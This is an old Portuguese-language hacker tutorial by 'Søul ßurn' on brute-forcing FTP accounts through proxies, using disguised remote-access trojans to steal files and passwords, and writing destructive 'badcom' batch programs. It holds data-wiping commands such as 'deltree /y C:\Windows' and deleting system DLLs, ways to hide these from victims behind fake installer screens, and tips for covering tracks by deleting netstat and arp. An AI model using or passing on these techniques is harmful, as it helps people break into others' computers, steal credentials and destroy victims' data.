tópicos______________________________________________________
-
Rapidas definições
-
Ataque por FTP
-
Utilização
de trojans
-
Criação
de Badcom's
-
Dicas
definições______________________________________________________
-
Os Hackers todos
sabemos quem são. Eles invadem em benefício próprio.
Eles pegam tudo e não destroem nada. Portanto, diferente dos crackers.
-
Os Crackers são
como os hackers, mas gostam de ver a destruição, eles invadem
e destroem só para ver o caos depois na TV.
-
Os Phreackers são
os piratas da telefonia, eles fazem de tudo que é relativo aos telefones,
convencionais ou celulares.
-
Os Carders, aqueles
que fazem compras com cartão de crédito alheio ou gerado,
ou seja, os Carders tem uma grande facilidade de comprar pela Internet.
Escrito por Søul ßurn
ataque por
FTP_________________________________________________
A invasão
por FTP é, de certa forma, simples de ser efetuadas, embora seja
muito lenta e cansativa. Para isso exercê-la, você pode usar
programas como o WebCracker e uma boa Wordlist, embora existam melhores
programas.Este processo nada mais é do que um "jogo de tentativa
e erro", onde você pode esperar o programa trabalhar, ou você
mesmo pode entrar em ação, caso você tenha informações
sobre o proprietário ta conta que você quer hackear; mas não
se esqueça que nada que produza um bom resultado é fácil
de ser realizado. Na maioria das vezes os servidores matêm logado
os IPs que tiveram tentativas frustadas ao tentarem a conexão com
o servidor FTP, por isso, não se esqueça de sempre, mas sempre
utilizar um proxy anônimo quando for realizar este tipo de ataque...
senão, isso pode ter consequencias mais graves do que você
imagina. Bom, este tipo de ataque geralmente é utilizado para o
hackeamento de páginas ou para a aquisição do arquivo
se senhas do provedor, e como fazê-lo? Da seguinte forma: Suponhamos
que você queira hackear um página, já conseguiu o Login
e Senha dela, aí já tá na mão... é so
usar um programa qualquer como o WS_FTP ou qualquer outro e modificar o
código HTML da página. No caso do furto do arquivo de senhas,
a coisa muda de figura... nunca subestime um Sysop, ele é mais inteligente
do que você imagina, e, provavelmente não vai deixar o arquivo
exposto no diretório /etc para que você possa simplesmente
ir lá baixar o arquivo, então, provavelmente terá
que sair procurar o arquivo pelos diretórios e depois, você
pode utilizar a mesma wordlist usada anteriormente para desencryptar o
arquivo de senhas. Lembre-se que somente entrando "anonymous" em um provedo
você NÃO estará hackeando...
Escrito por Søul ßurn
utilização
de trojans__________________________________________
Aqui farei uma
breve descrição de como se utilizar um trojan, mas antes,
uma definição sempre ajuda. O trojan ou trojan horse (Caválo
de Tróia) é um programa elaborado para tirar proveito da
ingenuidade das pessoas. Os trojans, geralmente são aplicativos
de cliente/servidor, que, não algum computador está com a
parte "servidor" rodando, ele está totalmente vulnerável
a um ataque, que fatalmente ocorrerá. O servidor disponibiliza uma
porta especifica que fica aguardando o momento da conexão com o
cliente. Quando conectado ao servidor, o cliente proporciona ao seu operador
um total controle sobre a máquivo servidora, possuindo até
mesmo "poder" maior que o operador local da máquina servidora.
Este tipo de
ataque é muito simples de ser efetuado, basta um pouco de prática.
Geralmente, estes trojans são compostos de três programas:
um é o clique, outro é o servidor e o terceiro é um
programa que configura o servidor. O primeiro passo seria configurar o
servidor, escolhendo a porta a ser aberta, proteção com password,
a forma de alocação do servidor na máquina da vítima
e alguns outros utilitários mais. Após o servidor estar pronto,
deve-se partir para a infecção da vítima, esta, para
alguns, provavelmente é a parte mais difícil: você
pode disfarçá-lo como uma foto, jogo, ou alguma outra coisa
mais que seja mais convincente. Agora a última e mais divertida
parte: conectando-se ao servidor!!! Abra então o cliente, caso tenha
alterado a porta default ao editar o servidor, deve-se também alterá-la
no cliente, caso contrário não haverá conexão.
Feito isso, pega-se o IP da vítima e coloca-o no cliente e, após
a conexão estabelecida, caso tenha optado pela proteção
com password, aparecerá uma caixa onde a senha escolhida deverá
ser digitada, de forma que, se a mesma estiver incorréta, você
será imediatamente desconectado. Se a conexão for bem sucedida,
você já está pronto para fazer o que quiser... Como
copiar arquivos, roubar senhas, etc... A única coisa que peço
para que não fazerem é destruir dados, isso não compensa;
não leva a nada. Os trojans, podem ser usados não somente
para a invasão, como também para a aquisição
de senhas do micro da vítima. Existem muitos desses programas, alguns
simples, outros sofisticados, os simples geralmente gravam as senhas em
um arquivo que é escondido em algum diretório pouco acessado
pelo usuário local, para o que "hacker" possa recuperá-lo
posteriormente, entretanto, existem programas como o "K2PS" que registram
TODOS os passwords digitados pela vítima, e assim que o computador
é conectado a rede, um e-mail contendo todas as senhas é
enviado ao intruso, sem que a vítima suspeite.
Escrito por Søul ßurn
criação
de badcom's____________________________________________
Badcom's
são programas de lote, que, após concluídos, são
compilados de .BAT passando para .COM, onde seu font já não
pode mais ser visto. Estes programas de lote são bem úteis
e simples de serem criados, para quem é um bom conhecedor dos comandos
do MS-DOS. Neste texto explicarei somente os comandos básicos para
a criação dos badcom's:
ECHO
Comando utilizado
para enviar mensagens de tela, ocultar ou exibir os comandos que serão
dados posteriormente pelo Badcom. O comando é usado seguido de "ON"
para ativar o ECHO ou "OFF" para desativá-lo. Exemplo:
@echo off
<desativa o echo, ocultando os comandos seguintes>
@echo on
<ativa o echo, passando a exibir os comandos>
Perceba que a
"@" foi utilizada para que nem mesmo a utilização do comando
"echo" fosse exibida. Caso o Echo esteja desativado e você queira
mandar uma mensagem de tela, faço o seguinte:
Echo "Digite sua mensagem aqui"
<Sem as aspas>
MD
Utilizado para
a criação de diretórios. Exemplo:
Md "nome_do_diretóroio"
<sem as aspas>
RD
Deve-se usar
para a remoção de diretórios totalmente vazios. Exemplo:
Rd "nome_do_diretório"
<sem as aspas>
ATTRIB
Este é
utilizado para definir atributo aos arquivos, podendo ocultá-los,
protegê-los contra gravação e remoção,
definí-los como arquivos do sistema ou como um arquivo arquivado.Exemplo:
Attrib +H teste.doc
<Ativa atributo oculto no arquivo teste.doc>
Attrib +R teste.doc
<Ativo atributo arquivo simpels em teste.doc>
Attrib +A teste.doc
<Ativa atributo de arquivo arquivado em teste.doc>
Attrib +S teste.doc
<Ativa atributo de arquivo do sistema em teste.doc>
Attrib -H -S
-R -A teste.doc <Desativa atributos oculto,
de sistema, de
arquivo protegido e arquivo arquivo em
teste.doc>
DEL
Comando que
deletar arquivos especificados pelo usuários. Exemplo:
Del *.exe
<Deletará todos os arquivos .EXE do presente diretório>
Del a*.doc
<Deletará arquivos iniciados em A e .DOC do corrente diretório>
Del *.*
<Deletará todos os arquivos do corrente diretório, exceto
os que
estiverem protegidos com atributo "+R">
Del c:\windwos\system\*.dll
<Deletará todos os arquivos .dll da subpasta
C:\WINDOWS\System>
DELTREE
Este pode ser
considerado um dos mais perigosos comandos, pois é simples de ser
usado, e, caso ocorra um pequeno erro em sua utilização,
ele pode causar sérios danos.. Este comando pode deletar qualquer
arquivo, mesmo estando oculto ou protegido contra gravação.
Seu funcionamente é mais ou menos como o do DEL.
Exemplo:
Deltree "caminho_a_deletar"
<Sem as aspas>
Deste forma,
quando o micro receber a ordem de executar o comando, será exibibda
uma mensagem de confirmação da exclusão, e dificilmente
o usuario concordará com a exclusão. Exemplo:
Deltree C:\Win98
[ENTER]
Excluir a pasta
"Win98" e todas as suas subpastas?[sn]
Entretanto há
uma opção que retira este BUG do deltree, tornando o comando
ainda mais destrutivo. Para isso, deve-se usar a opção:
/Y.
Exemplo:
Deltree /y C:\Windows
[ENTER]
Excluindo "Windows"...
REN
O Ren é
um comando utilizado para renomear arquivos. embora ele não seja
destrutivo, ele é um comando que pode causar muitos problemas ao
usuário. Com ele, você pode camuflar arquivos seus ou de seus
programas, na máquina da vítima, sem que ele tenha idéia
do que seja, ou até mesmo renomeat os arquivos necessários
para o BOOT do micro, o Win.com, entre outros. Seu funcionamento ocorre
da seguinte forma: Dá-se o comando, seguido do nome original do
arquivos e, logo após, o nome que deve ser tomado.Exemplo:
Ren "novo_original"
"novo_nome" [ENTER]
<sem as aspas>
MOVE
O Move é
outro comando que também pode ser de muita utilidade. Ele server
como um mobilizador de arquivos, tirando-os de um lugar e colocando-os
em outro. Exemplo:
Move c:\windows\javainst.log
c:\java [ENTER]
C:\Windows\javainst.log
=> C:\Java\javainst.log [ok]
No exemplo acima,
o arquivo "javainst.log" foi retirado do diretório "C:\Windows"
e colocado no diretório "C:\Java", ao final, é exibido "[ok]"
indicando que a transferência foi efetuada com êxito.
PAUSE
O pause é
um comnado de simples utilização, porém, ele propociona
um toque a mais de realidade em seus badcom's. Exemplo:
Pause
[ENTER]
Pressione qualquer
tecla para continuar . . .
GOTO
Goto é
o comando utilizado para que o programa retorne ou avance a uma parte
do Badcom especificada pelo usuário. Deve ser utilizado quando você
desejar que o programa repita uma série de comandos infinitamente,
ou até que o usuário finalize o Badcom. Exemplo:
@echo off
cls
:BEGIN
[<------ Especifica que o grupo BEGIN inicia-se aqui]
echo.
echo -=## ßåТØm
##=-
echo BaDcOm
By Søul ßurn
echo BaDcOm'S
nAmE: Cå§h (V)åKëR v1.0
echo Thņ'§
i† !¡!
echo -=## ßåТØm
##=-
echo.
GOTO BEGIN
[<------ Especifica para onde o programa
deve retornar]
CHOICE, IF
e ERRORLEVEL
A utilização
destes comandos em conjunto, cria um prompt para que o usuário escolhe
uma das opções disponiblizadas pelo Badcom, simulando um
menu de opções. Exemplo:
@echo off
cls
echo »
O que deseja fazer com este arquivo? «
echo »1«
Copiar Arquivo
echo »2«
Deletar Arquivo
echo »3«
Sair do Menu
choice /c123
if errorlevel
3 goto Copy
if errorlevel
2 goto Del
if errorlevel
1 goto Quit
:Copy
copy arquivo
c:\
goto Quit
:Del
Del arquivo
goto Quit
:Quit
Cls
EXIST
Este é
mais um comando avançado para se utilizar em Badcom's. Ele pode
ser combinado com o comando IF.
Sua função é a seguinte:Suponhamos que você
queira excluir o diretório "C:\CGI" e você não tem
certeza que o diretório exista na máquina da vítima,
e, caso você coloque o comando para deletar o arquivo e ele não
for encontrado, a vítima verá a mensagem de erro e suspeitará
de você, pois você que passou-lhe o programa. Então
para que não ocorra esta desconfiança por parte da vítima,
você deve utilizar o comando EXIST da
seguinte forma:
If exist C:\CGI
deltree /y C:\CGI
Ou seja: Se existe
C:\CGI então delete C:\CGI; literalmente seria mais ou menos isso.
COMPLEMENTOS
Para que seu
Badcom fique com aspectos mais convincentes de que realmente é um
programa de instalação ou algo similar, e levante menos suspeitas
na vítima, você pode também usar comando como o MEM
e muitos outros outros, ou até mesmo inserir imagens, utilizando
outros programas. Aqui darei uma breve instrução de como
utilizar o comando MEM
em seus Badcom's.
MEM
O comando MEM
é um comando utilizado para exibir a quantidade de memória
livre e utilizada. Ele pode ser muito util na simulação de
verif'cação de memória livre em sistema, por exemplo:
@echo off
cls
echo Iniciando
a instalação!
pause
echo Checando
a memória disponível em sistema . . .
mem
echo Teste OK...
echo Continuando
a instalação.
Este foi um exemplo
muito simples, foi a primeira coisa que me veio na cabeça, mas,
em seus Badcom's você pode e deve melhorar este exemplo 100%.
Escrito por Søul ßurn
dicas__________________________________________________________
-
Sempre que você
for tentar infectar alguém através do ICQ, sempre disfarça
o seu IP, utilizando um Proxy SOCKS5 ou qualquer outro método.
-
Ao invadir uma máquina,
a primeira coisa que deve ser feita é deletar os arquivos "C:\Windows\Arp.exe"
e "C:\Windows\Netstat.exe", assim você correrá menos riscos.
-
Outra coisa muito
importante é sempre tomar cuidado com seus Scans... Tudo bem que
isso não é ilegal, mas você pode ter problemas se Scanear
os lugares errados. Ao Scanear, seu IP poderá ficar logado e posteriormente,
seu pai receberá algumas ligações, caso você
ainda não seja maior de idade.
Escrito por Søul ßurn
|